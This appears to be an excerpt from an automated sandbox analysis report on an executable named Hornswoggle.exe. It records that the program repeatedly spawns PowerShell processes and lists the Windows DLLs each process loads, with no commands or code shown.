    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
